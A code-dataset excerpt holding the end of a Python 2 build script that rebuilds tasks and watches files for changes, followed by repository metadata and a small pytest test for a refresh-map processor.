# for t in build_context.tasks:
# print t, str(build_context.tasks[t])
for task in tasks:
build_context.build_task(task)
# print json.dumps(
# dict((name,
# str(task.value)[0:100] + "..."
# if 100 < len(str(task.value))
# else str(task.value))
# for name, task in build_context.tasks.iteritems()),
# indent=2)
if watch:
print
print "resolving watch targets"
# establish watchers
observer = Observer()
buildcontexteventhandler = BuildContextFsEventHandler(build_context)
built_tasks = ((taskname, task)
for taskname, task in build_context.tasks.iteritems()
if task.last_build_time > 0)
for taskname, task in built_tasks:
for f in task.task.file_watch_targets:
if os.path.isdir(f):
print "%s: watching %s" % (taskname, f)
observer.schedule(
buildcontexteventhandler,
f,
recursive=True)
else:
print "%s: watching %s for %s" % (taskname, os.path.dirname(f),
os.path.basename(f))
dirname = os.path.dirname(f)
observer.schedule(
buildcontexteventhandler,
dirname if dirname != "" else ".",
recursive=True)
print
print "watching for changes"
observer.start()
try:
while True:
sleep(0.5)
except KeyboardInterrupt:
observer.stop()
observer.join()
def query_skeleton(skeleton_path):
build_context = load_context_from_skeleton(skeleton_path);
return [name
for name, task in build_context.tasks.iteritems()
if task.exposed]
| 30.992063 | 83 | 0.588732 |
ace0aad91953a3ab8dc575ef3b7a2c595cf65dd5 | 606 | py | Python | zero_to_one_hundred/tests/test_refresh_map_processor.py | obar1/0to100 | 1337fb51d6704505126e159b64b7dba3e2ad16c2 | [
"Apache-2.0"
] | null | null | null | zero_to_one_hundred/tests/test_refresh_map_processor.py | obar1/0to100 | 1337fb51d6704505126e159b64b7dba3e2ad16c2 | [
"Apache-2.0"
] | 12 | 2021-09-06T10:41:37.000Z | 2021-10-03T19:26:20.000Z | zero_to_one_hundred/tests/test_refresh_map_processor.py | obar1/0to100 | 1337fb51d6704505126e159b64b7dba3e2ad16c2 | [
"Apache-2.0"
] | 1 | 2021-09-22T15:30:22.000Z | 2021-09-22T15:30:22.000Z | # pylint: disable=W0621,C0116,R0903,E0401,W0703,W1201,missing-function-docstring,E0401,C0114,W0511,W1203,C0200,C0103,W1203
from factories.ztoh_factory import ZTOHFactory
from processors.refresh_map_processor import RefreshMapProcessor
from repository.process_fs import ProcessFS as process_fs
from tests.moke.persist_fs import PersistFS as persist_fs
def test_process(get_config_map, get_args_refresh_map_processor):
actual: RefreshMapProcessor = ZTOHFactory(
persist_fs, process_fs, get_config_map
).get_processor(get_args_refresh_map_processor)
for p in actual:
p.process()
| 43.285714 | 122 | 0.820132 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.